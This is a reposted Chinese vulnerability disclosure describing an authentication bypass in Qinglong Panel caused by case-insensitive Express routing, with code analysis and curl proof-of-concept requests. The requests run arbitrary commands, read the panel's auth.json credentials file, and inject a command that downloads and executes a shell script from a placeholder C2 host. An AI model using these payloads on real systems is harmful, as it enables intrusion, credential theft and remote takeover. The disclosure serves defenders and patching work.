文章总结: 青龙面板存在严重鉴权绕过漏洞,源于正则配置缺陷及Express路由大小写不敏感特性。攻击者利用路径大小写差异绕过JWT校验,调用接口执行任意命令或读取账户密码。文章提供了详细原理分析与POC,证实漏洞危害巨大,建议立即排查修复鉴权逻辑。 综合评分: 90 文章分类: 漏洞分析,漏洞POC,WEB安全,漏洞预警
青龙面板存在鉴权绕过:可获取面板账户密码、执行任意命令
原创
Allen666 Allen666
Cloud Security lab
2026年2月27日 16:26 北京
青龙面板存在鉴权绕过:可获取面板账户密码、执行任意命令
漏洞概述
近日,发现青龙面板存在严重安全漏洞。攻击者可在绕过身份鉴权的情况下,通过特定接口执行任意系统命令,进而获取管理员账号密码等敏感信息,对系统安全构成严重威胁。
漏洞详情
漏洞类型
- 身份认证绕过漏洞(Authentication Bypass)
原理分析
该漏洞源于青龙面板的身份验证机制存在缺陷,具体体现在以下代码逻辑中:
// back/loaders/express.ts
path: [...config.apiWhiteList, /^\/(?!api\/).*/]
上述正则表达式的配置存在问题。系统对API白名单的处理采用了严格的全小写匹配机制,当请求路径不以/api/开头时,会直接绕过JWT(JSON Web Token)校验。
进一步分析发现,自定义鉴权中间件使用了如下判断逻辑:
if (!['/open/', '/api/'].some((x) => req.path.startsWith(x))) {
return next();
}
该逻辑同样采用严格的纯小写路径前缀匹配,在实际应用中存在安全隐患。
Express框架默认采用大小写不敏感的路由匹配机制。意味着/API/这样的路径既能绕过令牌校验,又能成功匹配到/api/路由,从而完全绕过所有身份验证机制。
最终,通过app.use(config.api.prefix, routes())的配置,攻击者可以随意调用后端API接口。
资产测绘
漏洞验证与利用
攻击者可通过以下方式验证和利用该漏洞:
RCE
curl -X PUT "http://IP:5700/API/system/command-run" -H "Content-Type: application/json" -d '{"command": "id"}'
敏感信息获取
curl -X PUT "http://IP:5700/API/system/command-run" -H "Content-Type: application/json" -d '{"command": "cat /ql/data/config/auth.json"}'
RCE
curl -X POST "http://IP/API/dependencies" \
-H "Content-Type: application/json" \
-d '[{"name": "$(curl -fsSL https://C2:8000/shell.sh | sh)", "type": 0}]'
最后 公众号接入了AI & MCP,如果还有需要《GO黑帽编程》的同学直接某盘下载即可 通过XX分享的文件:Go黑帽子渗透测试编程之道.pdf 链接: https://pan.百度.com/s/1ZRezXd9e0C-KQYuapW6baQ?pwd=cr2d 提取码: cr2d
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Cloud Security lab Allen666 Allen666《青龙面板存在鉴权绕过:可获取面板账户密码、执行任意命令》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论